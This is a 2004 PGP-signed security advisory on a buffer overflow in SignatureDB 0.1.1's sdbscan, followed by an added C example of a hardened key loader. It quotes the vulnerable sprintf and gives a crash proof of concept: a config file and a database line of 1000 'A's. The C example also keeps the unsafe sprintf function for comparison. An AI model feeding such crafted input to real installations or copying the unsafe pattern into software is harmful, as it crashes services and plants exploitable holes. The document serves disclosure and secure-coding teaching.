-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
File: LynX-adv4_SignatureDB.txt
Date: 15/02/2004
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

o NAME: problems with database files in 'SignatureDB'

o CLASS: denial of service (DoS) via buffer overflow

o PROGRAM: SignatureDB [http://pldaniels.com/signaturedb/]
  - Affected versions: 0.1.1
  - Immune versions: none known at the time of writing

o OS: Linux and UNIX clones

o VENDOR: Paul L Daniels

o DESCRIPTION:
  'SignatureDB' is actually two components: a signature database, which is
  available on the internet, and a 'signatureID' program, which scans your
  files. You can in effect consider 'SDB/ID' in the same way you consider and
  use an 'AntiVirus' program, but 'SDB/ID' is aimed at a slightly different
  sector of the industry. Its purpose is to provide signatures/fingerprints of
  common, annoying emails/files, not specifically viruses.

o VULNERABILITY DESCRIPTION:
  The 'SignatureDB' package contains the 'sdbscan' program, which scans files
  according to a specified database file. A sufficiently long 'key' field in
  a line of this database file overflows a fixed-size 20-byte buffer and
  causes a 'Segmentation fault'. The functions that work with the contents of
  database files are located in 'ringsearch.c'. My comments follow '#'.
  Line numbers are those of the 0.1.1 sources.

  Cut from file 'ringsearch.h':
  ...
  33 struct _infonode {
  34     char key[20];
  35     char *comment;
  36     int major;
  37     int minor;
  38     int flags;
  39 };
  ...

  Cut from file 'ringsearch.c':
  ...
  537 int RS_load_keys( struct _snode *parent, char *fname ){
      /* # 'fname' is the database filename */
  ...
  541 char line[10240];
      /* # 10240 bytes are reserved on the stack, but only 1024 are */
      /* # ever used; maybe the author made a typo and the last '0' */
      /* # is unnecessary :) */
  ...
  562 while (fgets(line, 1023, f)){
  ...
  582 sprintf(info->key,"%s",key);
      /* # the size of 'key' is not checked; it can be up to about */
      /* # 1018 bytes, while 'info->key' is only 20 bytes, so */
      /* # 'info->key' can be overflowed */

  This is only the first version of 'SignatureDB', so I think this problem
  will be fixed in the next versions.

  P.S. Sorry for my poor English :).

o VULNERABILITY PREVENTION:
  Instead of 'sprintf', it is more correct to use 'snprintf' with the size
  of the destination, e.g. snprintf(info->key, sizeof(info->key), "%s", key).
  Note that this only stops the overflow: an over-long key is then silently
  truncated to 19 characters, which changes which content the signature
  matches. A stricter fix is to reject (or at least log) any database line
  whose key does not fit in the field.

o EXPLOITING:
  It is possible to specify a configuration file for the 'sdbscan' program;
  in this file you may give the path to your own database file, whose
  contents can cause a buffer overflow and then a 'Segmentation fault'.

  Example of exploitation:

  [LynX@ /tmp]$ cat my.conf
  dbfile=/tmp/fake.db
  verbose=1
  fastscan=0
  fastexit=0
  [LynX@ /tmp]$ cat fake.db
  AAA ... '1000 x A' ... AAA:1:1:1:1:A:A
  [LynX@ /tmp]$ sdbscan --conf_file=my.conf
  Segmentation fault (core dumped)
  [LynX@ /tmp]$

o VENDOR RESPONSE:
  I sent a notification mail to Paul Daniels and did not receive an answer.

o CREDITS:
  - Thanks: nob0dy, netc0de, Xarth
  - Greets: R00T T34M [http://rootteam.void.ru], void, LimpidByte

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Discovered by LynX <_LynX@bk.ru>
/ close your eyes & dream with me /
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iEYEARECAAYFAkAv8HMACgkQjvZ3gq5fCnGA8gCgnqItklxup0YzArOkT6nn+kNI
5BgAoOf+SFgV1vXH73RcdzIWXbdXa8NK
=iIIl
-----END PGP SIGNATURE-----
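The following C example is added to this page to illustrate the overflow described above and the stricter fix suggested in the prevention section; it is not SignatureDB's own code. It reproduces only the parts the advisory shows (the 20-byte key field, a line buffer filled by fgets with a 1023 limit, the key being the text before the first ':') and assumes nothing else about the SDB database format. The loader rejects lines whose key does not fit instead of truncating them, and the sample database lines, including the 1000-'A' line from the exploit, are constructed here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Mirrors the fixed-size key field of struct _infonode in ringsearch.h. */
#define KEY_SIZE 20
/* fgets(line, 1023, f) in ringsearch.c reads at most 1022 characters. */
#define LINE_READ_LIMIT 1023

struct infonode {
    char key[KEY_SIZE];
    char *comment;
    int major;
    int minor;
    int flags;
};

/* Copies the first colon-separated field of 'line' into 'key', a buffer of
   'bufsize' bytes. Returns 0 on success, -1 if the field is empty or would
   not fit (including its terminating NUL), so it is never truncated. */
static int extract_key(const char *line, char *key, size_t bufsize)
{
    const char *colon = strchr(line, ':');
    size_t len = colon ? (size_t)(colon - line) : strcspn(line, "\r\n");

    if (len == 0 || len >= bufsize)
        return -1;
    memcpy(key, line, len);
    key[len] = '\0';
    return 0;
}

/* The vulnerable pattern from ringsearch.c line 582: sprintf into the
   20-byte field with no length check. Kept only for comparison; it must
   never be fed a key of 20 or more characters. */
static void load_key_unsafe(struct infonode *info, const char *key)
{
    sprintf(info->key, "%s", key);
}

/* Hardened version: an over-long key is an error, not a silent truncation. */
static int load_key_safe(struct infonode *info, const char *line)
{
    return extract_key(line, info->key, sizeof info->key);
}

/* Reads database lines from 'f' the way RS_load_keys does and fills 'out'
   (up to 'max' entries). Returns the number of accepted entries and reports
   the number of rejected lines through 'rejected'. */
static size_t load_keys(FILE *f, struct infonode *out, size_t max, size_t *rejected)
{
    char line[LINE_READ_LIMIT];
    size_t n = 0;

    *rejected = 0;
    while (fgets(line, LINE_READ_LIMIT, f)) {
        if (n < max && load_key_safe(&out[n], line) == 0)
            n++;
        else
            (*rejected)++;
    }
    return n;
}

int main(void)
{
    /* Constructed database: one valid line and the 1000-'A' line from the
       advisory's fake.db, written to a temporary file for the demo. */
    char bad[1100];
    struct infonode db[4];
    size_t rejected, n;
    FILE *f = tmpfile();

    if (!f)
        return 1;
    memset(bad, 'A', 1000);
    strcpy(bad + 1000, ":1:1:1:1:A:A");
    fprintf(f, "AAA:1:1:1:1:A:A\n%s\n", bad);
    rewind(f);

    n = load_keys(f, db, 4, &rejected);
    fclose(f);
    printf("accepted %zu key(s), rejected %zu line(s)\n", n, rejected);
    if (n > 0)
        printf("first key: %s\n", db[0].key);
    return 0;
}
```

The unsafe loader is included only to show the exact pattern that overflows; with the 1000-byte key of the exploit it would write far past info->key, which is what the reported crash is. The safe loader refuses that line outright rather than keeping a 19-character prefix that would match different content.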